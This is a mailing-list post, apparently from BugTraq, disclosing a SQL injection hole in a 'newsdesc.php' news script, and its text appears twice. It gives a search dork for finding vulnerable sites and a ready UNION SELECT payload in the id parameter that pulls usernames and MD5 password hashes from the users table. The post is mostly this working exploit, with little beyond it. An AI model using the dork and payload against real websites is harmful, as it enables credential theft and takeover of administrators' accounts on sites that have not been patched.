BugTraq
Back to list
|
Post reply
online newspaper university"newsdesc.php" SQL Injection Vulnerabilities
Apr 11 2012 09:29PM
CrAzY_CrAcKeR phx1-ss-2-lb cnet com
##################################################################
# Title : online newspaper university "newsdesc.php" SQL Injection Vulnerabilities
#
# Discovered By: CrAzY CrAcKeR
#
# Home : Null
#
# Email : CrAzY_CrAcKeR (at) hotmail.com (dot) com [email concealed]
#
# date : 12/4/2012
#
# d0rk:- inurl:"inurl:news/newsdesc.php"
#
##################################################################
##################################################################
#
# +-+-+-+-+-+-+-+-+-+-+
# --+CrAzY CrAcKeR+--
# +-+-+-+-+-+-+-+-+-+-+
#
#
##################################################################
##################################################################
# Example:-
#
# [-] http://www.???.com/news/newsdesc.php?id=(sql)
#
# [-] Injection code.... ( 0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%2
0-- )
#
# [-] http://www.???.com/news/newsdesc.php?id=2+and+1=0+union+select+1,concat(
username,0x3a,password),3,4,5,6%20FROM%20users%20--
#
# [-] you see now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend "A7eb Alwrd"
####################################################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
##################################################################
# Title : online newspaper university "newsdesc.php" SQL Injection Vulnerabilities
#
# Discovered By: CrAzY CrAcKeR
#
# Home : Null
#
# Email : CrAzY_CrAcKeR (at) hotmail.com (dot) com [email concealed]
#
# date : 12/4/2012
#
# d0rk:- inurl:"inurl:news/newsdesc.php"
#
##################################################################
##################################################################
#
# +-+-+-+-+-+-+-+-+-+-+
# --+CrAzY CrAcKeR+--
# +-+-+-+-+-+-+-+-+-+-+
#
#
##################################################################
##################################################################
# Example:-
#
# [-] http://www.???.com/news/newsdesc.php?id=(sql)
#
# [-] Injection code.... ( 0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%2
0-- )
#
# [-] http://www.???.com/news/newsdesc.php?id=2+and+1=0+union+select+1,concat(
username,0x3a,password),3,4,5,6%20FROM%20users%20--
#
# [-] you see now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend "A7eb Alwrd"
####################################################################
[ reply ]